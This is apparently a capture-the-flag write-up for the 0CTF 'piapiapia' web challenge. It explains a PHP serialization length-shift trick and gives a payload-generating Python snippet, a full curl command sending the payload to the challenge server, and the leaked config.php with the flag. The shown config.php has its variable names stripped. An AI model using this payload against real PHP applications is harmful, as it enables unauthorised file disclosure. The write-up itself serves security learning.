h-otter/README.md

## README.md

      
    Raw
  

              README.md
            
          
    piapiapia (Web 6pts)

Points


We can post any string to update.php as "nickname" array.
A object was broken with serialize() and filter().
String length increased a char as filter() replace a serialized string from 'where' to 'hacker'.

Howto

nickname.py
#!/usr/bin/python
# -*- coding:utf-8 -*-
import urllib, urllib2
# --- main ---
def main():
  suffix = '";}s:5:"photo";s:10:"config.php'
  string = "where" * len(suffix) + suffix
  print "[+] attack with string: %s" % string
if __name__ == '__main__':
  main()
I posted generated string to update.php on 'nickname[]' with curl.
$ curl -v -F photo=@./hoge -F phone=11111111111 -F email="hoge@hoge.hoge" -F nickname[]=wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere;}s:5:photo;s:10:config.php -b "PHPSESSID=qqvl7cuj1lru13a3rimfjme4u5" http://202.120.7.203:8888/update.php

After update, we can get flag in src of profile's img tag. It is config.php which was encoded as base64.
config.php
<?php
        ['hostname'] = '127.0.0.1';
        ['username'] = '0ctf';
        ['password'] = 'oh-my-****-web';
        ['database'] = '0CTF_WEB';
         = '0ctf{fa717b49649fbb9c0dd0d1663469a871}';
?>